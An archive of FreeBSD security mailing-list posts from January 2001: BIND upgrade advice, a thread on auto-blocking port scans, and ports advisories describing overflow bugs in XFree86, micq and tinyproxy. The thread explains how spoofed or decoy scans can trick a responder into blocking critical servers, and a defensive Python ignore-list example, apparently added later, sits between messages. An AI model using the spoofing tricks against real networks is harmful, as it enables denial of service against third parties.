Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Mon, 29 Jan 2001 22:57:22 -0800
Received: (from cjc@localhost) by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f0U6x6E06482; Mon, 29 Jan 2001 22:59:06 -0800 (PST) (envelope-from cjc)
Date: Mon, 29 Jan 2001 22:59:05 -0800
From: "Crist J. Clark"
To: Roger Marquis
Cc: security@FreeBSD.ORG
Subject: Re: bind8.2.3 and installation problem
Message-ID: <20010129225905.F91447@rfx-216-196-73-168.users.reflex>
Reply-To: cjclark@alum.mit.edu
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: ; from marquis@roble.com on Mon, Jan 29, 2001 at 09:32:18PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, Jan 29, 2001 at 09:32:18PM -0800, Roger Marquis wrote:
> Mehmet Hinc wrote:
> > Stop in /usr/ports/net/bind8.
> > *** Error code 1
> >
> > What ??????????? Why??????????? I updated my ports and tried to install
> > bind8.2.3 because bind8.2.2 has had a vulnerability, so while I was
> > installing it, I had an error msg. (in the up)
> > please let me know how can I fix it !!!
>
> Bind was written on BSD. What's the point of using a port to
> upgrade it? All FreeBSD's bind port does is increase your chances
> of errors, reduce your system's overall QA, and install duplicate
> files in non-standard places. The following steps have worked
> flawlessly over this and several bind upgrades:

  # cd /usr/ports/net/bind8
  # make PREFIX=/usr install

PREFIX rocks.
--
Crist J. Clark                                cjclark@alum.mit.edu

From owner-freebsd-security  Mon Jan 29 23:12:46 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ducky.nz.freebsd.org (ns1.unixathome.org [203.79.82.27]) by hub.freebsd.org (Postfix) with ESMTP id 5D51E37B49A for ; Mon, 29 Jan 2001 23:12:27 -0800 (PST)
Received: from wocker (wocker.int.nz.freebsd.org [192.168.0.99]) by ducky.nz.freebsd.org (8.9.3/8.9.3) with ESMTP id UAA56104; Tue, 30 Jan 2001 20:12:22 +1300 (NZDT)
Message-Id: <200101300712.UAA56104@ducky.nz.freebsd.org>
From: "Dan Langille"
Organization: The FreeBSD Diary / FreshPorts
To: "Crist J. Clark"
Date: Tue, 30 Jan 2001 20:12:21 +1300
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Subject: Re: bind8.2.3 and installation problem
Reply-To: dan@langille.org
Cc: security@FreeBSD.ORG
In-reply-to: <20010129225905.F91447@rfx-216-196-73-168.users.reflex>
References: ; from marquis@roble.com on Mon, Jan 29, 2001 at 09:32:18PM -0800
X-mailer: Pegasus Mail for Win32 (v3.12c)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 29 Jan 2001, at 22:59, Crist J. Clark wrote:

> On Mon, Jan 29, 2001 at 09:32:18PM -0800, Roger Marquis wrote:
> > Mehmet Hinc wrote:
> > > Stop in /usr/ports/net/bind8.
> > > *** Error code 1
> > >
> > > What ??????????? Why??????????? I updated my ports and tried to install
> > > bind8.2.3 because bind8.2.2 has had a vulnerability, so while I was
> > > installing it, I had an error msg. (in the up)
> > > please let me know how can I fix it !!!
> >
> > Bind was written on BSD. What's the point of using a port to
> > upgrade it? All FreeBSD's bind port does is increase your chances
> > of errors, reduce your system's overall QA, and install duplicate
> > files in non-standard places. The following steps have worked
> > flawlessly over this and several bind upgrades:
>
>   # cd /usr/ports/net/bind8
>   # make PREFIX=/usr install
>
> PREFIX rocks.

It can't be that simple!
--
Dan Langille
pgpkey - finger dan@unixathome.org | http://unixathome.org/finger.php

From owner-freebsd-security  Mon Jan 29 23:54:41 2001
Delivered-To: freebsd-security@freebsd.org
Received: from imo-r14.mx.aol.com (imo-r14.mx.aol.com [152.163.225.68]) by hub.freebsd.org (Postfix) with ESMTP id 5E93537B4E0 for ; Mon, 29 Jan 2001 23:54:19 -0800 (PST)
Received: from FBSDSecure@aol.com by imo-r14.mx.aol.com (mail_out_v29.5.) id n.36.115ac9de (16785) for ; Tue, 30 Jan 2001 02:54:10 -0500 (EST)
From: FBSDSecure@aol.com Message-ID: <36.115ac9de.27a7cd22@aol.com> Date: Tue, 30 Jan 2001 02:54:10 EST Subject: Re: (no subject) To: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Mailer: AOL 5.0 for Windows sub 120 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In a message dated 1/28/01 2:29:59 AM Pacific Standard Time, kris@obsecurity.org writes: > > addresses are valid and which are not. So spoofing an IP address is pretty > > > close to impossible from a Dialup, xDSL, or cable modem. Another thing to > > > Wrong. If this were true, packet-flooding based denial of service > attacks would be almost impossible since they would be easily blocked > and traced. The sad fact of the matter is that the majority of > networks on the internet today, including ISPs do not implement egress > filtering. > > > point out though is if a hacker were to spoof his IP address and do a port > > > scan, what would be the point? The data is useless if it can't get back > to > > the individual. Besides, the portsentry package has a ignore file. > > You miss the point: the attacker won't get any information back out of > it, but if you have a fascist response to port scans which blackholes > all traffic coming from the IP address of the port scan, the attacker > can spoof the packets to come from a server which is critical to the > operation of your machine, such as your ISP's DNS servers, or mail > servers, which will cause your machine to blackhole them and thereby > shoot itself in the foot. At a lower level of annoyance, you can > blackhole popular websites like google which the user might use. > > The point is that automated active response is almost always a bad > idea, because it can be fooled into doing more harm than good. > > Kris > > Then why doesn't the ISPs use egress filtering? To me it would stop alot of the junk that is going on in the internet. 
Like I said, all critical IPs are placed in the ignore file. The DNS and email servers I did not consider, but they will be added. Thanks for the tip.

Dan.

From owner-freebsd-security Tue Jan 30 0: 1:10 2001
Delivered-To: freebsd-security@freebsd.org
Received: from imo-d07.mx.aol.com (imo-d07.mx.aol.com [205.188.157.39])
	by hub.freebsd.org (Postfix) with ESMTP id EC65037B4EC
	for ; Tue, 30 Jan 2001 00:00:47 -0800 (PST)
Received: from FBSDSecure@aol.com
	by imo-d07.mx.aol.com (mail_out_v29.5.) id n.3c.6c030f5 (16785)
	for ; Tue, 30 Jan 2001 03:00:42 -0500 (EST)
From: FBSDSecure@aol.com
Message-ID: <3c.6c030f5.27a7ceaa@aol.com>
Date: Tue, 30 Jan 2001 03:00:42 EST
Subject: Re: (no subject)
To: freebsd-security@freebsd.org
MIME-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Mailer: AOL 5.0 for Windows sub 120
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In a message dated 1/28/01 12:43:34 PM Pacific Standard Time, root@noops.org writes:

> > On Sun, 28 Jan 2001, Chris wrote:
> >
> > > Another thing to point out though is if a hacker were to spoof his IP address
> > > and do a port scan, what would be the point? The data is useless if it can't
> > > get back to the individual.
> >
> > One word, DoS.
>
> Well, two words... one of which is DoS. Another, which I find fun, and
> also doesn't matter if your ISP does egress filtering, is to make a scan
> look like it came from your whole subnet. I'm sure that even if my DSL
> provider was making sure all the leaving traffic came from its network it
> would still be tough to catch. Or, and this is rare these days, if you
> are on an unswitched subnet or could somehow view traffic in flight you
> can always make the scan look like it came from the guy next door and just
> sniff the replies as they come back.
>
> I know my DSL is unfiltered on its way out, so if I'm doing an audit from
> home for any reason I always mix in 127.0.0.1 as a decoy -- just in case
> it hits something amusingly misconfigured, like a portsentry-type package
> with a glaring misconfiguration.
>
> -tcannon

That's why 127.0.0.1 is in the ignore file.

Reminds me of a phrase I heard somewhere... One false packet and I'll knock you off the net.... Or something like that.

Dan.
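The thread above turns on one defensive rule: an automated responder must check a scan's apparent source against a list of hosts it can never afford to blackhole (loopback, its own networks, the resolvers, the mail servers) before it adds a firewall rule, because that source address may be spoofed. The following is an added example of such a guard, written for this archive; it is not portsentry's or ipfw's own code. The resolv.conf text, the networks from the documentation ranges (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) and the ipfw rule number 1000 are constructed for the example, and the ipfw command is only returned as a string, never executed.

```python
"""Ignore-list guard for an automated port-scan responder (added example).

A scan source is checked against loopback, the local networks, the mail
servers and the nameservers from resolv.conf before any ipfw rule is
produced. Sources on that list are logged, not blocked, because a scan
claiming to come from them is exactly what a spoofing attacker would send.
"""
import ipaddress
import re

# Constructed resolv.conf contents for the example (not from a real host).
SAMPLE_RESOLV_CONF = """\
# generated by dhclient
domain example.net
nameserver 192.0.2.53
nameserver 192.0.2.54
nameserver not-an-address
"""


def resolvers_from_resolv_conf(text):
    """Return the nameserver addresses found in resolv.conf-style text."""
    found = []
    for line in text.splitlines():
        match = re.match(r"\s*nameserver\s+(\S+)", line)
        if not match:
            continue
        try:
            found.append(ipaddress.ip_address(match.group(1)))
        except ValueError:
            continue  # a malformed entry must not crash the responder
    return found


def build_ignore_list(local_networks, mail_servers, resolv_conf_text):
    """Networks whose traffic must never be blackholed automatically."""
    ignore = [ipaddress.ip_network("127.0.0.0/8")]
    ignore += [ipaddress.ip_network(n) for n in local_networks]
    ignore += [ipaddress.ip_network(h) for h in mail_servers]  # host -> /32
    ignore += [ipaddress.ip_network(str(r))
               for r in resolvers_from_resolv_conf(resolv_conf_text)]
    return ignore


def is_ignored(source, ignore_list):
    """True when `source` falls inside any ignored network."""
    ip = ipaddress.ip_address(str(source))
    return any(ip in net for net in ignore_list)


def respond_to_scan(source, ignore_list, rule_number=1000):
    """Decide the response to a scan apparently coming from `source`.

    Returns ("block", ipfw_command) for a blockable source, or
    ("log-only", reason) when the source is malformed or on the ignore
    list. Nothing is executed; the caller decides whether to run the rule.
    The rule number is a hypothetical value for the example.
    """
    try:
        ip = ipaddress.ip_address(source)
    except ValueError:
        return ("log-only", "unparseable source address %r" % (source,))
    if is_ignored(ip, ignore_list):
        return ("log-only", "%s is on the ignore list; possible spoof" % ip)
    return ("block", "ipfw add %d deny ip from %s to any" % (rule_number, ip))


if __name__ == "__main__":
    ignore = build_ignore_list(["198.51.100.0/24"], ["203.0.113.25"],
                               SAMPLE_RESOLV_CONF)
    for src in ("192.0.2.53", "127.0.0.1", "198.51.100.77", "203.0.113.99"):
        print(src, "->", respond_to_scan(src, ignore))
```

The ignore list is rebuilt from the live resolv.conf rather than typed by hand, so a resolver change from DHCP cannot silently turn the responder against the machine's own DNS; a real deployment would add the ISP's mail relays and any hosts the box depends on in the same way.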
From owner-freebsd-security Tue Jan 30 0:36:56 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.189])
	by hub.freebsd.org (Postfix) with SMTP id 1EEB037B698
	for ; Tue, 30 Jan 2001 00:36:10 -0800 (PST)
Received: (qmail 2054 invoked by uid 1000); 30 Jan 2001 08:34:17 -0000
Date: Tue, 30 Jan 2001 10:34:16 +0200
From: Peter Pentchev
To: Patrick Bihan-Faou
Cc: freebsd-hackers@freebsd.org, freebsd-security@freebsd.org
Subject: Re: Bash2 removes SSH_CLIENT from the environment
Message-ID: <20010130103415.B328@ringworld.oblivion.bg>
Mail-Followup-To: Patrick Bihan-Faou , freebsd-hackers@freebsd.org, freebsd-security@freebsd.org
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from patrick@netzuno.com on Mon, Jan 29, 2001 at 03:09:30PM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, Jan 29, 2001 at 03:09:30PM -0500, Patrick Bihan-Faou wrote:
> Hi,
>
> I am writing some script that looks for the SSH_CLIENT environment variable.
> As specified in the sshd(8) man page, this variable should contain the IP
> address of the client, the port number on the client side and the port
> number on the server side.
>
> However I found that if the login shell of the user is set to bash (version
> 2.03 or 2.04 at least), this variable is never set. Upon inspection of the
> code for bash, it appears that bash is explicitly removing the definition
> of this environment variable. Would anybody have an idea why ???
>
> Also the fix to leave SSH_CLIENT defined is trivial, is that something that
> would be desirable for the bash2 port ?

Huh?

[roam@ringworld:v2 ~]$ ssh roam@localhost '/bin/echo "shell is $BASH_VERSION, SSH_CLIENT is $SSH_CLIENT"'
roam@localhost.office1's password:
shell is 2.04.0(1)-release, SSH_CLIENT is 127.0.0.1 1075 22
[roam@ringworld:v2 ~]$

This is on 4.2-stable with bash installed from the shells/bash2 port.
Are you sure you don't have anything in your profiles that unsets
unknown variables or something?

G'luck,
Peter

-- 
.siht ekil ti gnidaer eb d'uoy ,werbeH ni erew ecnetnes siht fI

From owner-freebsd-security Tue Jan 30 1:10:25 2001
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21])
	by hub.freebsd.org (Postfix) with ESMTP id 7327637B4EC;
	Tue, 30 Jan 2001 01:09:52 -0800 (PST)
Received: (from kris@localhost)
	by freefall.freebsd.org (8.11.1/8.11.1) id f0U99qv87528;
	Tue, 30 Jan 2001 01:09:52 -0800 (PST)
	(envelope-from security-advisories@FreeBSD.org)
Date: Tue, 30 Jan 2001 01:09:52 -0800 (PST)
Message-Id: <200101300909.f0U99qv87528@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86
Reply-To: security-advisories@FreeBSD.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:07                                            Security Advisory
                                                                FreeBSD, Inc.

Topic:          Multiple XFree86 3.3.6 vulnerabilities

Category:       ports
Module:         XFree86-3.3.6, XFree86-aoutlibs
Announced:      2001-01-23
Credits:        Chris Evans
                Michal Zalewski
Affects:        Ports collection prior to the correction date.
Corrected:      2000-10-24 (XFree86-3.3.6)
Vendor status:  Fixed in XFree86 4.0.1, no patches released by vendor.
FreeBSD only:   NO

I.   Background

XFree86 is a popular X server. It exists in three versions in the
FreeBSD ports collection: 3.3.6 and 4.0.2, as well as a.out libraries
based on XFree86 3.3.3.

II.  Problem Description

The XFree86-3.3.6 port, versions prior to 3.3.6_1, has multiple
vulnerabilities that may allow local or remote users to cause a denial
of service attack against a vulnerable X server. Additionally, local
users may be able to obtain elevated privileges under certain
circumstances.

X server DoS:

Remote users can, by sending a malformed packet to port 6000 TCP, cause
the victim's X server to freeze for several minutes. During the freeze,
the mouse does not move and the screen does not update in any way. In
addition, the keyboard is unresponsive, including console-switch and
kill-server key combinations. Non-X processes, such as remote
command-line logins and non-X applications, are unaffected by the
freeze.

Xlib holes:

Due to various coding flaws in libX11, privileged (setuid/setgid)
programs linked against libX11 may allow local users to obtain elevated
privileges.

libICE DoS:

Due to inadequate bounds checking in libICE, a denial of service exists
with any application using libICE to listen on a network port for
network services.

The XFree86-aoutlibs port contains the XFree86 libraries from the 3.3.3
release of XFree86, in a.out format suitable for use with applications
in the legacy a.out binary format, most notably the FreeBSD native
version of Netscape. It is unknown whether Netscape is vulnerable to the
problems described in this advisory, but it is believed that the only
potential vulnerability is the libICE denial-of-service condition
described above.

The XFree86 and XFree86-aoutlibs ports are not installed by default
(although XFree86 is available as an installation option in the FreeBSD
installer), nor are they "part of FreeBSD" as such: they are part of the
FreeBSD ports collection, which contains almost 4500 third-party
applications in a ready-to-install format. The ports collections
shipped with FreeBSD 3.5.1 and 4.1.1 contain these problems since they
were discovered after the releases, but the XFree86 problem was
corrected prior to the release of FreeBSD 4.2. At the time of advisory
release, the XFree86-aoutlibs port has not been corrected.

FreeBSD makes no claim about the security of these third-party
applications, although an effort is underway to provide a security
audit of the most security-critical ports.

III. Impact

Local or remote users may cause a denial of service attack against an X
server or certain X applications. Local users may obtain elevated
privileges with certain X applications.

If you have not chosen to install the XFree86 3.3.6 port/package or the
XFree86-aoutlibs port/package, or you are running XFree86 4.0.1 or
later, then your system is not vulnerable to this problem.

IV.  Workaround

Deinstall the XFree86-3.3.6 and XFree86-aoutlibs ports/packages, if you
have installed them.

Note that any statically linked binaries which make use of the
vulnerable XFree86 routines may still be vulnerable to the problems
after deinstallation of the port/package. However, due to the difficulty
of developing a reliable scanning utility for such binaries, no such
utility is provided.

V.   Solution

One of the following:

1) Upgrade your entire ports collection and rebuild the XFree86-3.3.6
port.

2) Deinstall the old package and install an XFree86-4.0.2 package
obtained from:

[i386]
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/x11/XFree86-4.0.2_5.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/x11/XFree86-4.0.2_5.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/x11/XFree86-4.0.2_5.tgz

[alpha]
Packages are not automatically generated for the alpha architecture at
this time due to lack of build resources.

NOTE: XFree86-3.3.6 packages are no longer made available, only the
newer XFree86-4.0.2 packages.

Note also that the XFree86-aoutlibs port has not yet been fixed: there
is currently no solution to the problem other than removing the
port/package and recompiling any dependent software to use ELF
libraries, or switching to an ELF-based version of the software, if
available (e.g. the BSD/OS or Linux versions of Netscape, as an
alternative to the FreeBSD native version). The potential impact of the
vulnerabilities to the local environment may be deemed not sufficiently
great to warrant this approach, however.

3) download a new port skeleton for the XFree86-3.3.6 port from:

http://www.freebsd.org/ports/

and use it to rebuild the port.

4) Use the portcheckout utility to automate option (3) above. The
portcheckout port is available in /usr/ports/devel/portcheckout or the
package can be obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBOm3xpFUuHi5z0oilAQF+zQQAiwIQSv6MemATgo6v2/QwMjttGpbMxbh2
s94CK+aAlbtRlsrBZl6DIWwVydc1C3k6EHnM+NHqwhfOq/yrwp7JDKwVUmvi+5Qx
1UAY8QRu45OednLsyT2qUuNrowjMmkdB0EcsqQq2UvLtN2054m6AmpZk1t3TjGTr
CCOFX30qIn0=
=pI+q
-----END PGP SIGNATURE-----

From owner-freebsd-security Tue Jan 30 1:15:23 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72])
	by hub.freebsd.org (Postfix) with ESMTP id 4A2EB37B6A2
	for ; Tue, 30 Jan 2001 01:15:03 -0800 (PST)
Received: by obsecurity.org (Postfix, from userid 1000)
	id 7EA9FBA2B4; Tue, 30 Jan 2001 01:15:33 -0800 (PST)
Date: Tue, 30 Jan 2001 01:15:33 -0800
From: Kris Kennaway
To: FBSDSecure@aol.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: (no subject)
Message-ID: <20010130011533.A43910@xor.obsecurity.org>
References: <36.115ac9de.27a7cd22@aol.com>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
	protocol="application/pgp-signature"; boundary="pWyiEgJYm5f9v55/"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <36.115ac9de.27a7cd22@aol.com>; from FBSDSecure@aol.com on Tue, Jan 30, 2001 at 02:54:10AM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

--pWyiEgJYm5f9v55/
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

On Tue, Jan 30, 2001 at 02:54:10AM -0500, FBSDSecure@aol.com wrote:
> Then why don't the ISPs use egress filtering? To me it would stop
> a lot of the junk that is going on in the internet. Like I said, all
> critical IPs are placed in the ignore file. The DNS and email
> servers I did not consider, but they will be added. Thanks for the
> tip.

"It's too difficult", etc.

Kris

--pWyiEgJYm5f9v55/
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE6doY1Wry0BWjoQKURArbDAJ91xuPFqDorzUVZqynLXIBLNUc6vgCfWM2Z
YxtEC1zpMPIHcaIOEyXp53w=
=VXrk
-----END PGP SIGNATURE-----

--pWyiEgJYm5f9v55/--

From owner-freebsd-security Tue Jan 30 1:15:30 2001
Delivered-To: freebsd-security@freebsd.org
Received: from lists01.iafrica.com (lists01.iafrica.com [196.7.0.141])
	by hub.freebsd.org (Postfix) with ESMTP id 7A9F637B6A1
	for ; Tue, 30 Jan 2001 01:15:09 -0800 (PST)
Received: from nwl.fw.uunet.co.za ([196.31.2.162])
	by lists01.iafrica.com with esmtp (Exim 3.12 #2)
	id 14NWa7-0006PU-01; Tue, 30 Jan 2001 10:56:07 +0200
Received: (from nobody@localhost)
	by nwl.fw.uunet.co.za (8.8.8/8.6.9) id KAA16857;
	Tue, 30 Jan 2001 10:18:37 +0200 (SAST)
Received: by nwl.fw.uunet.co.za via recvmail id 16731; Tue Jan 30 10:18:30 2001
Received: from sheldonh (helo=axl.fw.uunet.co.za)
	by axl.fw.uunet.co.za with local-esmtp (Exim 3.20 #1)
	id 14NVzi-0000sd-00; Tue, 30 Jan 2001 10:18:30 +0200
From: Sheldon Hearn
To: "Jacques A. Vidrine"
Cc: freebsd-security@freebsd.org
Subject: Re: cvs commit: src/usr.bin/login login.c
In-reply-to: Your message of "Tue, 23 Jan 2001 15:48:29 CST." <20010123154829.A74738@hamlet.nectar.com>
Date: Tue, 30 Jan 2001 10:18:30 +0200
Message-ID: <3386.980842710@axl.fw.uunet.co.za>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, 23 Jan 2001 15:48:29 CST, "Jacques A. Vidrine" wrote:

> This gets you to the point that if you carefully [1] configure PAM, and
> you log in using pam_krb5, you will have tickets. As per the pam_krb5
> documentation, you have to destroy them yourself with `kdestroy'.

I find this cron job useful:

# Destroy all stale Kerberos5 tickets
#
for i in `find /tmp -name 'krb5cc_*' -ctime +1 -print` ; do
	rm -f "$i"
done

Ciao,
Sheldon.

From owner-freebsd-security Tue Jan 30 1:25:34 2001
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21])
	by hub.freebsd.org (Postfix) with ESMTP id 5CAA937B4F8;
	Tue, 30 Jan 2001 01:25:01 -0800 (PST)
Received: (from kris@localhost)
	by freefall.freebsd.org (8.11.1/8.11.1) id f0U9P1C89113;
	Tue, 30 Jan 2001 01:25:01 -0800 (PST)
	(envelope-from security-advisories@FreeBSD.org)
Date: Tue, 30 Jan 2001 01:25:01 -0800 (PST)
Message-Id: <200101300925.f0U9P1C89113@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-01:14.micq
Reply-To: security-advisories@FreeBSD.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:14                                            Security Advisory
                                                                FreeBSD, Inc.

Topic:          micq remote buffer overflow vulnerability

Category:       ports
Module:         micq
Announced:      2001-01-29
Credits:        recidjvo@pkcrew.org
Affects:        Ports collection prior to the correction date.
Corrected:      2001-01-24
Vendor status:  Updated version released
FreeBSD only:   NO

I.   Background

micq is a text-based ICQ client.

II.  Problem Description

The micq port, versions prior to 0.4.6.1, contains a remote
vulnerability: due to a buffer overflow, a malicious remote user sending
specially-crafted packets may be able to execute arbitrary code on the
local system with the privileges of the micq process. To accomplish
this, the attacker must be able to sniff the packets between the micq
client and ICQ server in order to gain the session key to cause the
client to accept the malicious packets.

The micq port is not installed by default, nor is it "part of FreeBSD"
as such: it is part of the FreeBSD ports collection, which contains over
4500 third-party applications in a ready-to-install format. The ports
collections shipped with FreeBSD 3.5.1 and 4.2 contain this problem
since it was discovered after the releases.

FreeBSD makes no claim about the security of these third-party
applications, although an effort is underway to provide a security
audit of the most security-critical ports.

III. Impact

Malicious remote users may cause arbitrary code to be executed with the
privileges of the micq process.

If you have not chosen to install the micq port/package, then your
system is not vulnerable to this problem.

IV.  Workaround

Deinstall the micq port/package, if you have installed it.

V.   Solution

One of the following:

1) Upgrade your entire ports collection and rebuild the micq port.

2) Deinstall the old package and install a new package dated after the
correction date, obtained from:

[i386]
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/net/micq-0.4.6.1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/net/micq-0.4.6.1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/net/micq-0.4.6.1.tgz

[alpha]
Packages are not automatically generated for the alpha architecture at
this time due to lack of build resources.

3) download a new port skeleton for the micq port from:

http://www.freebsd.org/ports/

and use it to rebuild the port.

4) Use the portcheckout utility to automate option (3) above. The
portcheckout port is available in /usr/ports/devel/portcheckout or the
package can be obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBOnXfalUuHi5z0oilAQEhPQP/aq4wwNE4IFedgd2Fz8IEZo+cfiu5dsPa
P1fNoylanm+TbLBEV+hJwjt5lBQHQoEmMh3efz2x7foj42QMP6YPtw6WPcwbXtVQ
uTSra4+3Ck2NdO+5WDju2X0kMbIBWJMCAPrGEpr/EkNbJRu76Ojp6Cw31WBx17X7
BwLriuu9c9I=
=Iluh
-----END PGP SIGNATURE-----

From owner-freebsd-security Tue Jan 30 1:26:21 2001
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21])
	by hub.freebsd.org (Postfix) with ESMTP id 505AD37B4E0;
	Tue, 30 Jan 2001 01:25:26 -0800 (PST)
Received: (from kris@localhost)
	by freefall.freebsd.org (8.11.1/8.11.1) id f0U9POS89150;
	Tue, 30 Jan 2001 01:25:24 -0800 (PST)
	(envelope-from security-advisories@FreeBSD.org)
Date: Tue, 30 Jan 2001 01:25:24 -0800 (PST)
Message-Id: <200101300925.f0U9POS89150@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-01:15.tinyproxy
Reply-To: security-advisories@FreeBSD.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:15                                            Security Advisory
                                                                FreeBSD, Inc.

Topic:          tinyproxy contains remote vulnerabilities

Category:       ports
Module:         tinyproxy
Announced:      2001-01-29
Credits:        |CyRaX|
Affects:        Ports collection prior to the correction date.
Corrected:      2001-01-22
Vendor status:  Updated version released
FreeBSD only:   NO

I.   Background

tinyproxy is a lightweight http proxy.

II.  Problem Description

The tinyproxy port, versions prior to 1.3.3a, contains remote
vulnerabilities: due to a heap overflow, malicious remote users can
cause a denial-of-service by crashing the proxy. Additionally, the
attacker may potentially cause arbitrary code to be executed as the user
running tinyproxy.

The tinyproxy port is not installed by default, nor is it "part of
FreeBSD" as such: it is part of the FreeBSD ports collection, which
contains over 4500 third-party applications in a ready-to-install
format. The ports collections shipped with FreeBSD 3.5.1 and 4.2 contain
this problem since it was discovered after the releases.

FreeBSD makes no claim about the security of these third-party
applications, although an effort is underway to provide a security
audit of the most security-critical ports.

III. Impact

Malicious remote users may cause a denial-of-service and potentially
cause arbitrary code to be executed.

If you have not chosen to install the tinyproxy port/package, then your
system is not vulnerable to this problem.

IV.  Workaround

Deinstall the tinyproxy port/package, if you have installed it.

V.   Solution

One of the following:

1) Upgrade your entire ports collection and rebuild the tinyproxy port.
2) Deinstall the old package and install a new package dated after the
correction date, obtained from:

[i386]
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/www/tinyproxy-1.3.3a.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/www/tinyproxy-1.3.3a.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/www/tinyproxy-1.3.3a.tgz

[alpha]
Packages are not automatically generated for the alpha architecture at
this time due to lack of build resources.

3) download a new port skeleton for the tinyproxy port from:

